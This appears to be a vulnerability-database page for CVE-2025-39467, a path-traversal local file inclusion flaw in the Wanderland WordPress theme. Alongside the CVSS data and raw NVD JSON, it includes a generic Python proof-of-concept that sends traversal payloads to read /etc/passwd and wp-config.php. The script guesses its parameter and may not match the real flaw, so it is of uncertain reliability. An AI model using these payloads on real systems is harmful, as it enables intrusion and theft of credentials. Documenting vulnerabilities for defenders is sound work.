Security Vulnerability Report
中文
CVE-2025-39467 CVSS 8.1 HIGH

CVE-2025-39467

Published: 2025-11-06 16:15:51
Last Modified: 2026-04-27 19:16:13

Description

Path Traversal: '.../...//' vulnerability in Mikado-Themes Wanderland wanderland allows PHP Local File Inclusion.This issue affects Wanderland: from n/a through <= 1.7.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:wanderland:*:*:*:*:*:wordpress:*:* - VULNERABLE
Wanderland <= 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-39467 PoC - Path Traversal leading to Local File Inclusion # Affected: Mikado-Themes Wanderland <= 1.7.1 target_url = "http://target-site.com/" # List of common sensitive files to read sensitive_files = [ "../../../../etc/passwd", ".../...//.../...//etc/passwd", "../../../../var/www/html/wp-config.php", ".../...//.../...//var/www/html/wp-config.php", "../../../../etc/hostname", ".../...//.../...//etc/hostname" ] def test_lfi(): """Test for Local File Inclusion vulnerability""" for file in sensitive_files: # Try to include sensitive files using path traversal payload = f"?file={file}" try: response = requests.get(target_url + payload, timeout=10) if response.status_code == 200: if "root:" in response.text or "wp_" in response.text: print(f"[+] Potential LFI found with payload: {payload}") print(f"[+] File content preview: {response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {payload}: {e}") return False if __name__ == "__main__": print("[*] Testing CVE-2025-39467 - Wanderland LFI") test_lfi()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39467", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:51.053", "lastModified": "2026-04-27T19:16:13.430", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in Mikado-Themes Wanderland wanderland allows PHP Local File Inclusion.This issue affects Wanderland: from n/a through <= 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:wanderland:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.7.2", "matchCriteriaId": "89F1E3FD-B8B9-4EDA-8335-56A9F54915A7"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-1-7-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}